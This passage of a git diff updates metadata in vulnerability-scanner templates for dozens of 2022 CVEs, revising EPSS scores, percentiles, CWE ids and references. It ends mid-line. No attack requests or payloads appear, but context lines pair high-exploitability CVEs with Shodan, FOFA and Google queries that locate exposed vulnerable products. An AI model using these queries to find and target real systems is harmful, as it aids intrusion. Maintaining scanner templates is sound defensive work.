CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97408 + epss-score: 0.9737 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99849 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 43e5b94040..3fa2b6e542 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2488 cwe-id: CWE-78 - epss-score: 0.97381 + epss-score: 0.97387 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99867 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index aa0df541fc..30dd72da18 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24899 cwe-id: CWE-79 - epss-score: 0.00254 + epss-score: 0.00303 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* + epss-percentile: 0.65765 metadata: max-request: 1 shodan-query: title:"Contao" diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 11bf209797..ac93cdd178 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2022-24900 - cwe-id: CWE-22,CWE-668 - epss-score: 0.00909 + cwe-id: CWE-668,CWE-22 + epss-score: 0.01086 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* + epss-percentile: 0.82518 metadata: max-request: 1 vendor: piano_led_visualizer_project diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index 8c8768a861..42d665e9f8 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -14,8 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24990 - epss-score: 0.96236 + cwe-id: CWE-306 + epss-score: 0.96102 cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* + epss-percentile: 0.99272 metadata: max-request: 1 shodan-query: "TerraMaster" diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index de4526034c..7c3256f814 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -13,9 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25082 - cwe-id: CWE-77 - epss-score: 0.04345 + cwe-id: CWE-78 + epss-score: 0.02673 cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* + epss-percentile: 0.89078 metadata: max-request: 2 vendor: totolink diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index fc4bc849ed..c7e278ac23 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25125 cwe-id: CWE-89 - epss-score: 0.01144 + epss-score: 0.01029 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* + epss-percentile: 0.81996 metadata: max-request: 1 fofa-query: icon_hash="1464851260" diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index c0173d5350..ce92fb13a6 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -13,8 +13,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - epss-score: 0.00838 + epss-score: 0.00979 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* + epss-percentile: 0.81504 metadata: max-request: 1 vendor: dvdfab diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index dbac1620f9..9c74749ff4 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-25323 cwe-id: CWE-79 - epss-score: 0.00129 + epss-score: 0.00132 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* + epss-percentile: 0.47422 metadata: max-request: 1 vendor: zerof diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index e3415eed65..c2b3fb1659 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-91 epss-score: 0.00437 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* + epss-percentile: 0.71533 metadata: max-request: 1 google-query: inurl:"/SecurityGateway.dll" diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml index 3b7147d84d..aa74576b9e 100644 --- a/http/cves/2022/CVE-2022-25369.yaml +++ b/http/cves/2022/CVE-2022-25369.yaml @@ -8,12 +8,12 @@ info: reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25369 cwe-id: CWE-425 - remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index 8731a3ab09..e182da5f35 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2544 cwe-id: CWE-425 - epss-score: 0.01127 + epss-score: 0.00695 cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.77722 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index ffdf295ed8..7ec42c5239 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00091 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.38082 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index b467d195b5..b03853fbdd 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-668 epss-score: 0.00892 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* + epss-percentile: 0.80599 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index d12246cfbc..ee38cf07aa 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.8 cve-id: CVE-2022-25485 cwe-id: CWE-829 - epss-score: 0.0107 + epss-score: 0.00878 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.80396 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index c0909b374f..6c64a082bb 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.8 cve-id: CVE-2022-25486 cwe-id: CWE-829 - epss-score: 0.00651 + epss-score: 0.01337 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.84385 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index b0722dde8b..f9abeac88d 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.79593 + epss-score: 0.82264 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.97952 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 8d748628f4..c5a8703e33 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 - epss-score: 0.01144 + epss-score: 0.00942 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.81133 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 56afa2efe2..dd1ec836c5 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 - epss-score: 0.00537 + epss-score: 0.016 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.85784 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 65496ac6ce..425d220ab4 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-25497 cwe-id: CWE-552 - epss-score: 0.00494 + epss-score: 0.00901 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.807 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 82dd88c56a..495f673e1b 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 - epss-score: 0.86816 + epss-score: 0.82414 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* + epss-percentile: 0.9796 metadata: max-request: 2 google-query: inurl:/backups-dup-lite/dup-installer/ diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index d92b301a0f..617b4def2d 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2599 cwe-id: CWE-79 - epss-score: 0.00071 + epss-score: 0.00078 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.32485 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 1655ee794e..3f38af7dc8 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26134 - cwe-id: CWE-74 - epss-score: 0.97537 + cwe-id: CWE-917 + epss-score: 0.97518 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.99975 metadata: max-request: 2 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 330511e237..c376f99ff2 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 - epss-score: 0.97313 + epss-score: 0.97318 cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* + epss-percentile: 0.99809 metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index fcbf9ffddb..f0f7cfee0d 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26148 cwe-id: CWE-312 - epss-score: 0.12526 + epss-score: 0.10813 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.94349 metadata: max-request: 1 fofa-query: app="Grafana" diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 1c3b151099..0f3437c94e 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-26159 - cwe-id: CWE-668 - epss-score: 0.00561 + cwe-id: CWE-425 + epss-score: 0.00665 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* + epss-percentile: 0.77095 metadata: max-request: 1 vendor: ametys diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 6e08959a20..40e3af431d 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 - epss-score: 0.00413 + epss-score: 0.00482 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.72843 metadata: max-request: 1 vendor: barco diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 4630b2e919..f571e5177c 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-26263 cwe-id: CWE-79 - epss-score: 0.00109 + epss-score: 0.00111 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* + epss-percentile: 0.4359 metadata: verified: true google-query: inurl:/u8sl/WebHelp diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 0485651b64..a531c4eb33 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index 3bb92d95b0..f6afd12a1f 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2022-2633 - cwe-id: CWE-73,CWE-610 - epss-score: 0.03888 + cwe-id: CWE-610,CWE-73 + epss-score: 0.04403 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91307 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 9473193169..6704dad26d 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22 - epss-score: 0.97512 + epss-score: 0.97466 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* + epss-percentile: 0.99936 metadata: max-request: 2 vendor: dotcms diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 763ad4d49a..641ea7e796 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00109 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* + epss-percentile: 0.43197 metadata: max-request: 3 shodan-query: http.favicon.hash:-1521640213 diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 2ae7a35ad1..e219de0ea5 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26833 cwe-id: CWE-306 - epss-score: 0.01062 + epss-score: 0.01194 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* + epss-percentile: 0.83396 metadata: max-request: 1 vendor: openautomationsoftware diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 674c5c73ef..2be2564b63 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.93292 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* + epss-percentile: 0.98708 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 30717cf336..729ffc5b16 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2733 cwe-id: CWE-79 - epss-score: 0.00238 + epss-score: 0.00175 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* + epss-percentile: 0.53954 metadata: max-request: 2 shodan-query: title:"OpenEMR" diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 66178b8ed1..f70cbc346b 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.5 cve-id: CVE-2022-2756 cwe-id: CWE-918 - epss-score: 0.00689 + epss-score: 0.00724 cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* + epss-percentile: 0.78253 metadata: max-request: 3 shodan-query: title:"kavita" diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 3b4e565a16..c744f3980f 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.1 cve-id: CVE-2022-27593 cwe-id: CWE-610 - epss-score: 0.58116 + epss-score: 0.56164 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* + epss-percentile: 0.97221 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index d9f95b8979..96938300ce 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-200 epss-score: 0.00654 cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.76863 metadata: max-request: 1 google-query: inurl:/wp-content/plugins/simple-ajax-chat/ diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 8f9eacd434..8b5d6f3b8a 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-27926 cwe-id: CWE-79 - epss-score: 0.93282 + epss-score: 0.93948 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* + epss-percentile: 0.98805 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d07a5acbc1..d42b4c642c 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.01576 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.85682 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index bb58c93149..5af476d840 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -10,13 +10,15 @@ info: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-27984 - https://www.cuppacms.com/ + - http://cuppa.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-27984 cwe-id: CWE-89 - epss-score: 0.01318 + epss-score: 0.0148 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.85145 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index f1eb61e9c6..0bde70b02b 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27985 cwe-id: CWE-89 - epss-score: 0.01366 + epss-score: 0.01534 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.85463 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index f19faccedc..bb7799253e 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.01144 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 9bf91fe3a0..addfa5be19 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.01144 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 39408dd8c6..99bf9626a7 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.01144 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index d700db5fa7..9311580ee5 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.82769 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.97977 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 85e2e74239..9fe8912220 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.01427 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.84873 metadata: max-request: 2 vendor: event_management_system_project diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index ad213701e4..bb15c9dbbf 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.9 cve-id: CVE-2022-28117 cwe-id: CWE-918 - epss-score: 0.01202 + epss-score: 0.01914 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* + epss-percentile: 0.87092 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index f1cca156a0..67dae3827b 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -23,6 +23,7 @@ info: cwe-id: CWE-611 epss-score: 0.97341 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.99825 metadata: max-request: 1 shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 8bf1accacf..f856e68bb9 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00099 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* + epss-percentile: 0.4034 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 9032c1188b..d053d9b067 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 - epss-score: 0.0028 + epss-score: 0.00237 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + epss-percentile: 0.61084 metadata: max-request: 1 vendor: reprisesoftware diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index e5cb013314..f12634d173 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-28365 - cwe-id: CWE-668 - epss-score: 0.00318 + cwe-id: CWE-425 + epss-score: 0.00333 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + epss-percentile: 0.67494 metadata: max-request: 1 vendor: reprisesoftware diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 526137c93d..352d3cd8a6 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 - epss-score: 0.69945 + epss-score: 0.63285 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* + epss-percentile: 